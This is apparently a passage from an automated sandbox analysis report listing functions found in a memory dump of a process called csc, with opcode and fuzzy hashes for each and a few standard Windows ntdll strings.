                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e09ddabb84c47c293d5f0d940dd900fa93056fb8b067dc290a36b5252fc2e02
                                                      • Instruction ID: 2a8dc5c01f75969f47a9321cc2b81571668198b3de3aa8f31613646d33373414
                                                      • Opcode Fuzzy Hash: 9e09ddabb84c47c293d5f0d940dd900fa93056fb8b067dc290a36b5252fc2e02
                                                      • Instruction Fuzzy Hash: D190022630140003D944715C54586068015D7E2301F95D011E1454554CDA15C9665332
                                                      Function 053E2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db97f33a6ecc05577b1b5990b5f339fbbb686e7ce01bce069c89f1d5f9d6c7a3
                                                      • Instruction ID: 4a925fe930df996762956e75d58c9f0e84f6a6654d2c30dc39d5f3469a8981bf
                                                      • Opcode Fuzzy Hash: db97f33a6ecc05577b1b5990b5f339fbbb686e7ce01bce069c89f1d5f9d6c7a3
                                                      • Instruction Fuzzy Hash: 1090022E21340002D984715C544860A4015C7D2202FD5D415A1055558CCA15C9795331
                                                      Function 053E3D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fad92e994810e0a40fc952dca9c43f8bfcbab7217e8f19d2d2e8f88c8b01310
                                                      • Instruction ID: a6c56a5d0c528df4b5b7d4f2a622090f2d8db086a443e484fc1f8292c7150638
                                                      • Opcode Fuzzy Hash: 6fad92e994810e0a40fc952dca9c43f8bfcbab7217e8f19d2d2e8f88c8b01310
                                                      • Instruction Fuzzy Hash: 94900236202401429D44725C5844A4E8115C7E2302BD5D415A1055554CCA14C9715331
                                                      Function 053E2D00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cf21ff3df21571fddb20ea6de95d434a918dbf2dcec37665291cf7e42372374
                                                      • Instruction ID: d5431a60281ee1b26e33211622ceefd387cbc6e16cae887029100d317af7329f
                                                      • Opcode Fuzzy Hash: 1cf21ff3df21571fddb20ea6de95d434a918dbf2dcec37665291cf7e42372374
                                                      • Instruction Fuzzy Hash: 8190022620544442D904755C5448A064015C7D1205F95D011A20A4595DC735C961A231
                                                      Function 053E3D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa988e9b4f380077839789a8ea0ab92ce18fd585eb15e5d49a0b5738605ca1c3
                                                      • Instruction ID: ab533377b0d14a33a9592733961321a9889b345622569b2c1cad723906fab5be
                                                      • Opcode Fuzzy Hash: fa988e9b4f380077839789a8ea0ab92ce18fd585eb15e5d49a0b5738605ca1c3
                                                      • Instruction Fuzzy Hash: 6C90023A20140402DD14715C58446464056C7D1301F95D411A1464558D8754C9B1A231
                                                      Function 053E2DB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db01f0640cc2090ce1a53c74724b0c2041c6b02be3bbf449d5da5ad1aa89a7ff
                                                      • Instruction ID: ba5eb16799cf7e6567d6aaf96630ff4ce4158d6b1c28cb846a2e51fb4e236cfe
                                                      • Opcode Fuzzy Hash: db01f0640cc2090ce1a53c74724b0c2041c6b02be3bbf449d5da5ad1aa89a7ff
                                                      • Instruction Fuzzy Hash: 3890023624140402D945715C44446064019D7D1241FD5C012A1464554E8755CB66AB71
                                                      Function 053E2DD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e715388f01ec9a3824f3c37646a47a04f9de9e6956921f95cd254cbb365aa76
                                                      • Instruction ID: 48dab7a870f440a1c192e4929f10231bb487c4948e38cf48716a3d728c04792f
                                                      • Opcode Fuzzy Hash: 0e715388f01ec9a3824f3c37646a47a04f9de9e6956921f95cd254cbb365aa76
                                                      • Instruction Fuzzy Hash: EA900226242441525D49B15C44445078016D7E12417D5C012A2454950C8626D966D731
                                                      Function 053E2C60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5422f2c050d8591601e80ecd25741174f3b7618202a661192ba85e3e94255c72
                                                      • Instruction ID: d8d15de73f26c45c2d327bda88771c2077de4d9cd1d8d938448fe13119c75820
                                                      • Opcode Fuzzy Hash: 5422f2c050d8591601e80ecd25741174f3b7618202a661192ba85e3e94255c72
                                                      • Instruction Fuzzy Hash: FD90023620140842D904715C4444B464015C7E1301F95C016A1164654D8715C9617631
                                                      Function 053E2CA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 99d7478b3a66d5abcc7c27b8494f4e2108a17410bc990b2e6f206bfc21d9d751
                                                      • Instruction ID: 27389619cc68c1202c0f7b3dd44b910bbfbe8c646c1f67add9854399cadf4f0e
                                                      • Opcode Fuzzy Hash: 99d7478b3a66d5abcc7c27b8494f4e2108a17410bc990b2e6f206bfc21d9d751
                                                      • Instruction Fuzzy Hash: 7490023620140402D904759C54486464015C7E1301F95D011A6064555EC765C9A16231
                                                      Function 053E2CF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9d29a7671af8946fdf48b77d4f1757e1b4232311b10f91c969a79299ed775d9
                                                      • Instruction ID: 7f3e6c1235939839d3ed1554882f778b6ba22d71b0ac6fe3efa9300c9bfcd883
                                                      • Opcode Fuzzy Hash: a9d29a7671af8946fdf48b77d4f1757e1b4232311b10f91c969a79299ed775d9
                                                      • Instruction Fuzzy Hash: 0690023620140403D904715C55487074015C7D1201F95D411A1464558DD756C9616231
                                                      Function 053E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8816adae82d689dd9e717e2733f312aa5c6b0b27267198460f9eacda9b8d2f5
                                                      • Instruction ID: 1ebdcc1546080030d08f844bc639bc145ea5855e7983f0db461bdc6da81cf6e8
                                                      • Opcode Fuzzy Hash: d8816adae82d689dd9e717e2733f312aa5c6b0b27267198460f9eacda9b8d2f5
                                                      • Instruction Fuzzy Hash: AD90022660540402D944715C54587064025C7D1201F95D011A1064554DC759CB6567B1
                                                      Function 053E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49c8d209867df9ec8c4b6e375b9ffd243344670b93435980aca2ad75292cbf70
                                                      • Instruction ID: bf6934eb178bc7ab550f60a07ee3888074bdf26357d25cc565a3856f0a012d5c
                                                      • Opcode Fuzzy Hash: 49c8d209867df9ec8c4b6e375b9ffd243344670b93435980aca2ad75292cbf70
                                                      • Instruction Fuzzy Hash: D790026634140442D904715C4454B064015C7E2301F95C015E20A4554D8719CD626236
                                                      Function 053E2F60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16fbdd06f8d38d2e2be1720af0738368b14703176fb5716af4c5fc3cd4fd8399
                                                      • Instruction ID: 65c37c60ae5a97bf43d95b0876daab93ca18c37f7a23c9142cd23a6bf6e41908
                                                      • Opcode Fuzzy Hash: 16fbdd06f8d38d2e2be1720af0738368b14703176fb5716af4c5fc3cd4fd8399
                                                      • Instruction Fuzzy Hash: 6A90026621140042D908715C44447064055C7E2201F95C012A3194554CC629CD715235
                                                      Function 053E2FB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36910ee2fa534729abf8383a5990f43371f516032c50220f7cc06fedce1fc77c
                                                      • Instruction ID: af9af11fa527c8d4e1b3668c34cc573ad3f0d53b2396764b68e75ac60b997d06
                                                      • Opcode Fuzzy Hash: 36910ee2fa534729abf8383a5990f43371f516032c50220f7cc06fedce1fc77c
                                                      • Instruction Fuzzy Hash: 16900226601400424944716C88849068015EBE2211795C121A19D8550D8659C9755775
                                                      Function 053E2FA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec482f0c51e06afb806fca0e1aa28f502de90dc88e3c8762619de895b72ceadc
                                                      • Instruction ID: e2cae4dfe5894a93ea54d73d71723d8403ae6b88cf77a176d40dd1c6add75ce0
                                                      • Opcode Fuzzy Hash: ec482f0c51e06afb806fca0e1aa28f502de90dc88e3c8762619de895b72ceadc
                                                      • Instruction Fuzzy Hash: DD90023620180402D904715C48487474015C7D1302F95C011A61A4555E8765C9A16631
                                                      Function 053E2F90 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 476aaee3b3d7aa31851dd77eb67122edb086ed931ca981023b612285ae5f6f33
                                                      • Instruction ID: 2471353e61076ff012298c810547f1963bd03d7a34ffa35d2e7b3874e028d8c6
                                                      • Opcode Fuzzy Hash: 476aaee3b3d7aa31851dd77eb67122edb086ed931ca981023b612285ae5f6f33
                                                      • Instruction Fuzzy Hash: 2690023620180402D904715C485470B4015C7D1302F95C011A21A4555D8725C9616671
                                                      Function 053E2FE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a14f605b453fc5079582daafc14c14115c2560444faab668fa0240d20e379db
                                                      • Instruction ID: a76540d8e0de9ada1b23a4fdbd0282c3a524e92bb8b0a47d135545d051a11581
                                                      • Opcode Fuzzy Hash: 8a14f605b453fc5079582daafc14c14115c2560444faab668fa0240d20e379db
                                                      • Instruction Fuzzy Hash: C3900226211C0042DA04756C4C54B074015C7D1303F95C115A1194554CCA15C9715631
                                                      Function 053E2E30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2c7428f23eaa05c94d8941e1f829f35ac77f15fb93b599dd38b6fae5bda4062
                                                      • Instruction ID: 17daaa41e86861d5a17d163ff60cf96a7e84546ff04411e6e616741925f84316
                                                      • Opcode Fuzzy Hash: d2c7428f23eaa05c94d8941e1f829f35ac77f15fb93b599dd38b6fae5bda4062
                                                      • Instruction Fuzzy Hash: 0690022630140402D906715C44546064019C7D2345FD5C012E2464555D8725CA63A232
                                                      Function 053E2EA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55448057833b2344201b9adc4a044a68cf3f9136537b2f042b83e386219cf3cc
                                                      • Instruction ID: 2ee6a3d87ff6cef79beddde8457eec17ed91dab80a93fb416f6b71b37b3f7583
                                                      • Opcode Fuzzy Hash: 55448057833b2344201b9adc4a044a68cf3f9136537b2f042b83e386219cf3cc
                                                      • Instruction Fuzzy Hash: 3490027620140402D944715C44447464015C7D1301F95C011A60A4554E8759CEE56775
                                                      Function 053E2E80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d07a313683ce3c6c2580022ff28fe72be118ed1d201424c565756eb43d653068
                                                      • Instruction ID: 691247ec03782261122c4c50db2f3cbebd30a82a1ee58a62cb687e0e7b2d70ce
                                                      • Opcode Fuzzy Hash: d07a313683ce3c6c2580022ff28fe72be118ed1d201424c565756eb43d653068
                                                      • Instruction Fuzzy Hash: EE90022660140502D905715C4444616401AC7D1241FD5C022A2064555ECB25CAA2A231
                                                      Function 053E2EE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87a7740281ccd63ed3c4211061fa9cd2f55c7a102afdcdd6eeb769e67a202172
                                                      • Instruction ID: aef0745949eda4c20d44699fb22e2455472908746949665af79aec68f3240dc9
                                                      • Opcode Fuzzy Hash: 87a7740281ccd63ed3c4211061fa9cd2f55c7a102afdcdd6eeb769e67a202172
                                                      • Instruction Fuzzy Hash: 8090026620180403D944755C48446074015C7D1302F95C011A30A4555E8B29CD616235
                                                      Function 053E39B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0591301bfdfde565d14d3cf8679b174a5b68d5113fda91b9e26875ddf08b2792
                                                      • Instruction ID: 353155f2bc8f449b475627bfea83d5903b7e2057fabe4de971902e589bf5aeda
                                                      • Opcode Fuzzy Hash: 0591301bfdfde565d14d3cf8679b174a5b68d5113fda91b9e26875ddf08b2792
                                                      • Instruction Fuzzy Hash: F490022624545102D954715C44446168015E7E1201F95C021A1854594D8655C9656331
                                                      Function 053E2BA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d97fd16a8b58065af345b068740cb16b0032aa0704b4f4ef278a83f1c7f22c9d
                                                      • Instruction ID: 2318b8517be4572d7e4c8aebfbff1ded257140d0cb0bbe879dae755a3134d36a
                                                      • Opcode Fuzzy Hash: d97fd16a8b58065af345b068740cb16b0032aa0704b4f4ef278a83f1c7f22c9d
                                                      • Instruction Fuzzy Hash: 8990023660540802D954715C44547464015C7D1301F95C011A1064654D8755CB6577B1
                                                      Function 053E2B80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5c88f9c182248d6fec5d996953fe4cb1717925de05ea85a8d7fea2fd5df03d3
                                                      • Instruction ID: 5634834590ebccb5033d162389ba3cd63e385e5849922214a86348f22bfcd1f3
                                                      • Opcode Fuzzy Hash: a5c88f9c182248d6fec5d996953fe4cb1717925de05ea85a8d7fea2fd5df03d3
                                                      • Instruction Fuzzy Hash: D090023620140802D908715C48446864015C7D1301F95C011A7064655E9765C9A17231
                                                      Function 053E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36b4dfdd673a0b123ed7da5b38b2b76e72a5b51925c63fcb8a7a7bf830e1bb9d
                                                      • Instruction ID: d3c256c2c88636e643bae76d827980afe55be728800fd0bf7b64230869d69e19
                                                      • Opcode Fuzzy Hash: 36b4dfdd673a0b123ed7da5b38b2b76e72a5b51925c63fcb8a7a7bf830e1bb9d
                                                      • Instruction Fuzzy Hash: 4A90023620140802D984715C444464A4015C7D2301FD5C015A1065654DCB15CB6977B1
                                                      Function 053E2BE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae806f62e17162da8692e1db87ddcdc2c98466695e4c363969ab26f289a38286
                                                      • Instruction ID: 6527bf8865f39f146757341088d01d301d019b088c33670753745204111bbdf6
                                                      • Opcode Fuzzy Hash: ae806f62e17162da8692e1db87ddcdc2c98466695e4c363969ab26f289a38286
                                                      • Instruction Fuzzy Hash: C590023620544842D944715C4444A464025C7D1305F95C011A10A4694D9725CE65B771
                                                      Function 053E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5915ad7003145d799a5517630154311b047bd5965b66864234c18a55ce22f8b
                                                      • Instruction ID: 63b76cc18e5b1cf62e562f91f8f197fafdd0d77534fa04a7a5945fc1241d4166
                                                      • Opcode Fuzzy Hash: b5915ad7003145d799a5517630154311b047bd5965b66864234c18a55ce22f8b
                                                      • Instruction Fuzzy Hash: F49002A6201540924D04B25C8444B0A8515C7E1201B95C016E2094560CC625C9619235
                                                      Function 053E2AF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c329253509673703a39081d7ad6207baabba4c44c1771c7bd2bb7d058af9e1e4
                                                      • Instruction ID: b609cdc605816192a12c76fa4c5dc79b9fe8985e39277ea3d96427e66ba47060
                                                      • Opcode Fuzzy Hash: c329253509673703a39081d7ad6207baabba4c44c1771c7bd2bb7d058af9e1e4
                                                      • Instruction Fuzzy Hash: 0090022A221400020949B55C064450B4455D7D73513D5C015F2456590CC721C9755331
                                                      Function 053E2AD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d723077219c32153f9efcb4be7ec2d58ed37ec99423b179ea9ac0aa8218c1074
                                                      • Instruction ID: 03ec67b89368403f97744d8f623b2350862d6f5e323cfd03e1d36731fcfb3d57
                                                      • Opcode Fuzzy Hash: d723077219c32153f9efcb4be7ec2d58ed37ec99423b179ea9ac0aa8218c1074
                                                      • Instruction Fuzzy Hash: 3390022A211400030909B55C07445074056C7D6351395C021F2055550CD721C9715231
                                                      Function 053E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: a4b188911ce8dc51ca128c4506e29e4637a67d9e9639b35e27b6eea303c022f3
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 053E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 8a157bc15f7570eeebec3297968f83660c277d1604d8bc47eba3922cc4c7def6
                                                      • Instruction ID: bdf2aa70d5a45b149cb654e94fb0985b7bb6c9c68cb47e4c7364cc5b531ead43
                                                      • Opcode Fuzzy Hash: 8a157bc15f7570eeebec3297968f83660c277d1604d8bc47eba3922cc4c7def6
                                                      • Instruction Fuzzy Hash: 9B51B6BAA0412ABFCB25DB99889097FF7FDBB08200754816AF469D7681D374DE50C7E0
                                                      Function 053D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ExecuteOptions, xrefs: 054146A0
                                                      • Execute=1, xrefs: 05414713
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05414742
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05414787
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05414725
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05414655
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054146FC
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: c80bd21dce7f38996a9ea8b41a41262d859b267f7e41560d95cbf98e6ac469b3
                                                      • Instruction ID: 2e4aadf103c1d9db9c88c2a67c203f6cc8cf0ad0f3e89212fc613e8acda40769
                                                      • Opcode Fuzzy Hash: c80bd21dce7f38996a9ea8b41a41262d859b267f7e41560d95cbf98e6ac469b3
